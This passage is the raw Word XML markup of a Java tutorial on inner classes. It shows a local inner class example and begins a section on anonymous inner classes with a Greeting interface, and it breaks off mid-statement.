          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LocalInnerClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CE29D8"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38981"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        localInner</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>show</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A280E1A"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38981"/>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3DB1ABA0"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38981"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6411EB18"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38981"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E74ECFC"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38981"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Test</w:t>
      </w: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06B43D4B"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38981"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w: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4BA00D22"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38981"/>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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OuterClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> outer </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OuterClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5624B59B"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38981"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        outer</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>display</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5957D67F"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38981"/>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5A7567BE" w14:textId="19E93DBD"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38981"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016376EF" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="0013258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Anonymous Inner Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD64D52" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="0013258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n </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>anonymous inner class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a type of inner class that doesn’t have a name. It is used to instantiate classes that extend other classes or implement interfaces directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D830F1"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3004731"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Greeting</w:t>
      </w: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2DDA3D35"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3004731"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> greet</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286AE1D0"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3004731"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2765ADF3"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3004731"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CEFE66"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3004731"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Test</w:t>
      </w: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5A024E98"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3004731"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w: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258DF843"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3004731"/>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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Greeting</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> greeting </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Greeting</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Anonymous inner class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5279E10E"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3004731"/>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006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BBB133"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3004731"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> greet</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w: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4389C692"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3004731"/>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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
